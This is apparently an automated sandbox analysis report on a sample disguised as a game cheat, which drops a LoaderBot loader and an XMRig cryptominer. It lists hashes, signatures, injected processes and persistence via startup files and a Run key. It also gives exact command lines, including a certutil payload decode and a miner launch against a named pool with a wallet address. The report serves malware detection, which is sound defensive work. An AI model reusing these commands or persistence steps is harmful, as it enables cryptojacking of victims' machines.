Overview
overview
10Static
static
38f60440853...18.exe
windows7-x64
78f60440853...18.exe
windows10-2004-x64
10$1/1337/Ex.exe
windows7-x64
7$1/1337/Ex.exe
windows10-2004-x64
10$1/1337/Ex...0].exe
windows7-x64
1$1/1337/Ex...0].exe
windows10-2004-x64
1$PLUGINSDI...em.dll
windows7-x64
3$PLUGINSDI...em.dll
windows10-2004-x64
3Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
02-06-2024 20:49
Static task
static1
Behavioral task
behavioral1
Sample
8f604408532bc298c12de77e77d67652_JaffaCakes118.exe
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
8f604408532bc298c12de77e77d67652_JaffaCakes118.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral3
Sample
$1/1337/Ex.exe
Resource
win7-20240215-en
Behavioral task
behavioral4
Sample
$1/1337/Ex.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral5
Sample
$1/1337/ExtrimHack [free][22.08.2020].exe
Resource
win7-20240508-en
Behavioral task
behavioral6
Sample
$1/1337/ExtrimHack [free][22.08.2020].exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral7
Sample
$PLUGINSDIR/System.dll
Resource
win7-20240221-en
Behavioral task
behavioral8
Sample
$PLUGINSDIR/System.dll
Resource
win10v2004-20240508-en
General
-
Target
$1/1337/Ex.exe
-
Size
3.1MB
-
MD5
7afcb8667f1ec33f0cc084936a8a4044
-
SHA1
a2755123f3515fbfcbd5b1ab38c22fa757b8afa8
-
SHA256
2304cf3b3d0753318d60c2769c535a164d5f56ee0343c59ac616036d95e8ad71
-
SHA512
bc04b81c01df03b360c225709d2db3078d1fb45fc2a67713f5f5154d050c71e241c2c7590f510d9f7ac3a0a4bc820b3b171d96cb56d23c0496df184e527162b8
-
SSDEEP
98304:A5aFQWMH0wPoBn1ZPBIjKNMxCSz4Rg4MuykNt:A5aF1MHropPDuhg3z
Malware Config
Signatures
-
LoaderBot executable 1 IoCs
resource yara_rule behavioral4/memory/4128-25-0x00000000127C0000-0x0000000012A14000-memory.dmp loaderbot -
XMRig Miner payload 12 IoCs
resource yara_rule behavioral4/memory/4928-48-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral4/memory/1060-51-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral4/memory/1060-52-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral4/memory/1060-53-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral4/memory/1060-54-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral4/memory/1060-55-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral4/memory/1060-56-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral4/memory/1060-57-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral4/memory/1060-58-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral4/memory/1060-59-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral4/memory/1060-60-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral4/memory/1060-61-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig -
Manipulates Digital Signatures 1 TTPs 3 IoCs
Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.1!7\Name = "szOID_ROOT_PROGRAM_AUTO_UPDATE_CA_REVOCATION" certutil.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.2!7\Name = "szOID_ROOT_PROGRAM_AUTO_UPDATE_END_REVOCATION" certutil.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.3!7\Name = "szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL" certutil.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation Ex.exe Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation RegAsm.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sys.url csrss.com File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url RegAsm.exe -
Executes dropped EXE 4 IoCs
pid Process 4260 csrss.com 4036 csrss.com 4928 Driver.exe 1060 Driver.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\RegAsm.exe" RegAsm.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4036 set thread context of 4128 4036 csrss.com 104 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs ping.exe 1 TTPs 2 IoCs
pid Process 2700 PING.EXE 1560 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4128 RegAsm.exe 4128 RegAsm.exe 4128 RegAsm.exe 4128 RegAsm.exe 4128 RegAsm.exe 4128 RegAsm.exe 4128 RegAsm.exe 4128 RegAsm.exe 4128 RegAsm.exe 4128 RegAsm.exe 4128 RegAsm.exe 4128 RegAsm.exe 4128 RegAsm.exe 4128 RegAsm.exe 4128 RegAsm.exe 4128 RegAsm.exe 4128 RegAsm.exe 4128 RegAsm.exe 4128 RegAsm.exe 4128 RegAsm.exe 4128 RegAsm.exe 4128 RegAsm.exe 4128 RegAsm.exe 4128 RegAsm.exe 4128 RegAsm.exe 4128 RegAsm.exe 4128 RegAsm.exe 4128 RegAsm.exe 4128 RegAsm.exe 4128 RegAsm.exe 4128 RegAsm.exe 4128 RegAsm.exe 4128 RegAsm.exe 4128 RegAsm.exe 4128 RegAsm.exe 4128 RegAsm.exe 4128 RegAsm.exe 4128 RegAsm.exe 4128 RegAsm.exe 4128 RegAsm.exe 4128 RegAsm.exe 4128 RegAsm.exe 4128 RegAsm.exe 4128 RegAsm.exe 4128 RegAsm.exe 4128 RegAsm.exe 4128 RegAsm.exe 4128 RegAsm.exe 4128 RegAsm.exe 4128 RegAsm.exe 4128 RegAsm.exe 4128 RegAsm.exe 4128 RegAsm.exe 4128 RegAsm.exe 4128 RegAsm.exe 4128 RegAsm.exe 4128 RegAsm.exe 4128 RegAsm.exe 4128 RegAsm.exe 4128 RegAsm.exe 4128 RegAsm.exe 4128 RegAsm.exe 4128 RegAsm.exe 4128 RegAsm.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 4128 RegAsm.exe Token: SeLockMemoryPrivilege 1060 Driver.exe Token: SeLockMemoryPrivilege 1060 Driver.exe -
Suspicious use of FindShellTrayWindow 6 IoCs
pid Process 4260 csrss.com 4260 csrss.com 4260 csrss.com 4036 csrss.com 4036 csrss.com 4036 csrss.com -
Suspicious use of SendNotifyMessage 6 IoCs
pid Process 4260 csrss.com 4260 csrss.com 4260 csrss.com 4036 csrss.com 4036 csrss.com 4036 csrss.com -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4684 wrote to memory of 1048 4684 Ex.exe 83 PID 4684 wrote to memory of 1048 4684 Ex.exe 83 PID 4684 wrote to memory of 1048 4684 Ex.exe 83 PID 4684 wrote to memory of 1732 4684 Ex.exe 85 PID 4684 wrote to memory of 1732 4684 Ex.exe 85 PID 4684 wrote to memory of 1732 4684 Ex.exe 85 PID 1732 wrote to memory of 4948 1732 cmd.exe 87 PID 1732 wrote to memory of 4948 1732 cmd.exe 87 PID 1732 wrote to memory of 4948 1732 cmd.exe 87 PID 4948 wrote to memory of 2700 4948 cmd.exe 88 PID 4948 wrote to memory of 2700 4948 cmd.exe 88 PID 4948 wrote to memory of 2700 4948 cmd.exe 88 PID 4948 wrote to memory of 1996 4948 cmd.exe 89 PID 4948 wrote to memory of 1996 4948 cmd.exe 89 PID 4948 wrote to memory of 1996 4948 cmd.exe 89 PID 4948 wrote to memory of 4260 4948 cmd.exe 90 PID 4948 wrote to memory of 4260 4948 cmd.exe 90 PID 4948 wrote to memory of 4260 4948 cmd.exe 90 PID 4948 wrote to memory of 1560 4948 cmd.exe 91 PID 4948 wrote to memory of 1560 4948 cmd.exe 91 PID 4948 wrote to memory of 1560 4948 cmd.exe 91 PID 4260 wrote to memory of 4036 4260 csrss.com 93 PID 4260 wrote to memory of 4036 4260 csrss.com 93 PID 4260 wrote to memory of 4036 4260 csrss.com 93 PID 4036 wrote to memory of 4128 4036 csrss.com 104 PID 4036 wrote to memory of 4128 4036 csrss.com 104 PID 4036 wrote to memory of 4128 4036 csrss.com 104 PID 4036 wrote to memory of 4128 4036 csrss.com 104 PID 4036 wrote to memory of 4128 4036 csrss.com 104 PID 4036 wrote to memory of 4128 4036 csrss.com 104 PID 4036 wrote to memory of 4128 4036 csrss.com 104 PID 4036 wrote to memory of 4128 4036 csrss.com 104 PID 4036 wrote to memory of 4128 4036 csrss.com 104 PID 4036 wrote to memory of 4128 4036 csrss.com 104 PID 4036 wrote to memory of 4128 4036 csrss.com 104 PID 4036 wrote to memory of 4128 4036 csrss.com 104 PID 4036 wrote to memory of 4128 4036 csrss.com 104 PID 4036 wrote to memory of 4128 4036 csrss.com 104 PID 4036 wrote to memory of 4128 4036 csrss.com 104 PID 4036 wrote to memory of 4128 4036 csrss.com 104 PID 4036 wrote to memory of 4128 4036 csrss.com 104 PID 4036 wrote to memory of 4128 4036 csrss.com 104 PID 4036 wrote to memory of 4128 4036 csrss.com 104 PID 4036 wrote to memory of 4128 4036 csrss.com 104 PID 4036 wrote to memory of 4128 4036 csrss.com 104 PID 4036 wrote to memory of 4128 4036 csrss.com 104 PID 4036 wrote to memory of 4128 4036 csrss.com 104 PID 4036 wrote to memory of 4128 4036 csrss.com 104 PID 4036 wrote to memory of 4128 4036 csrss.com 104 PID 4036 wrote to memory of 4128 4036 csrss.com 104 PID 4036 wrote to memory of 4128 4036 csrss.com 104 PID 4036 wrote to memory of 4128 4036 csrss.com 104 PID 4036 wrote to memory of 4128 4036 csrss.com 104 PID 4036 wrote to memory of 4128 4036 csrss.com 104 PID 4036 wrote to memory of 4128 4036 csrss.com 104 PID 4036 wrote to memory of 4128 4036 csrss.com 104 PID 4036 wrote to memory of 4128 4036 csrss.com 104 PID 4036 wrote to memory of 4128 4036 csrss.com 104 PID 4036 wrote to memory of 4128 4036 csrss.com 104 PID 4036 wrote to memory of 4128 4036 csrss.com 104 PID 4036 wrote to memory of 4128 4036 csrss.com 104 PID 4036 wrote to memory of 4128 4036 csrss.com 104 PID 4036 wrote to memory of 4128 4036 csrss.com 104 PID 4036 wrote to memory of 4128 4036 csrss.com 104
Processes
-
C:\Users\Admin\AppData\Local\Temp\$1\1337\Ex.exe"C:\Users\Admin\AppData\Local\Temp\$1\1337\Ex.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4684 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo pUVyOKPt2⤵PID:1048
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c mkdir C:\Users\Admin\AppData\Roaming\Sysfiles & cmd < XuGJAWtEjFqgoZUl.com2⤵
- Suspicious use of WriteProcessMemory
PID:1732 -
C:\Windows\SysWOW64\cmd.execmd3⤵
- Suspicious use of WriteProcessMemory
PID:4948 -
C:\Windows\SysWOW64\PING.EXEping -n 1 moLu.nnnbID4⤵
- Runs ping.exe
PID:2700
-
-
C:\Windows\SysWOW64\certutil.execertutil -decode qTh.com y4⤵
- Manipulates Digital Signatures
PID:1996
-
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.comcsrss.com y4⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4260 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com y5⤵
- Drops startup file
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4036 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe6⤵
- Checks computer location settings
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4128 -
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQqTgX5TEtWmQ8ZmVZ7 -p x -k -v=0 --donate-level=1 -t 47⤵
- Executes dropped EXE
PID:4928
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQqTgX5TEtWmQ8ZmVZ7 -p x -k -v=0 --donate-level=1 -t 47⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1060
-
-
-
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 304⤵
- Runs ping.exe
PID:1560
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
921KB
MD5c317736793ef5129f12a3568cd679422
SHA1e68b55969c5f2159c847a629fac3731c0c315d53
SHA256cbb5d906c63cbcb891b35e53156b643ac26c5dec922f43b2fd121ccca60beb62
SHA51269cb5fd5f1a30c3c786ca945b8de6a460d03605fc3416a3c33e69691603e1a43ad0cfefe9cd5d6af1a154b701ecf34526cc05d9235a4e38acf994eb0edb1a82c
-
Filesize
398B
MD50047726ce0f38e02fda2068d7ff7ceff
SHA10702fd3e290b95b70b5fc3b70cdb57c808baceb7
SHA2560423e080422306752ccf52e4639a8f6e58596176e730d10bd812012ccf4f296b
SHA51200b525c341b3297e3b011065b32bab9d29eee920e7faebea93e4fcc4fef69b166c11c10291cc9ba9b931551eca3dc9ddae27b681c4d4423478ea3a65d29c7d83
-
Filesize
2.3MB
MD509cc8b02108c2ca6db6197e37b165a65
SHA19f245c5206ce171cfc288ed8bf05896d1b36a1f0
SHA25689ad1822d2ee2d5e39d2e4aae2016562244f7ea43071c192e8989a3c2544d998
SHA512d50c20b554dd85996f8b7432fb3d3668c3fbfcd77314a4adc476861373a0350b122be61ab1aa087153e45c48cf6a453d0829ccfa4786cf679ee3dccb7cffadae
-
Filesize
921KB
MD58ed172328f643375ac09b31ffba0eb63
SHA1c6716e5e5a311f597e37c5660b0387ab8f77b2a0
SHA25623e87924005aeef08ab3c9402aa749c0373ed9fa6c1706c13ca1df5ec33f8928
SHA51279efbac3cbf2bbbf1b5572a3036845fd544210a01adf9850d22587df12fd84832e14e8f7e0476955a8d9bb42ff0be5ca4443cee8e83dc396e70d850e31c60938
-
Filesize
1.1MB
MD513a508782d30a527e997a64996920287
SHA14628a103700d13b6f3920b3a8a06e9757bf0a9eb
SHA256e06ad6278f8cdccb51ed58aee3d6ba97bd770b2d8b827746e539770fc959354e
SHA512cd860c7c8eea0faf0e62f1e695f60c02050c284617265f3e9c11dac4e4cbea34cb656719ae6bdeb39a36dd1446bb443cbcf9c9f4a595c1749f9088d7c082d142
-
Filesize
842KB
MD5dbcc4336d132df084c59bbddff9693f5
SHA1172d404379f6d288db4eacaa11bf0fa1ccffa451
SHA256ea3b51ae7fb4264cd4aca28f02fa027bb25ce69a9ece5ff1f9f581b1ae62c84e
SHA512d7209e47c9ef7e8f0db4bc736828e79d745415dde0dbaa7b4d5a21d6ee3406b139f3565cdcae16911c330d3ebbe1bcbe77f5e40d2313909a3b7b58697d3d4e34
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322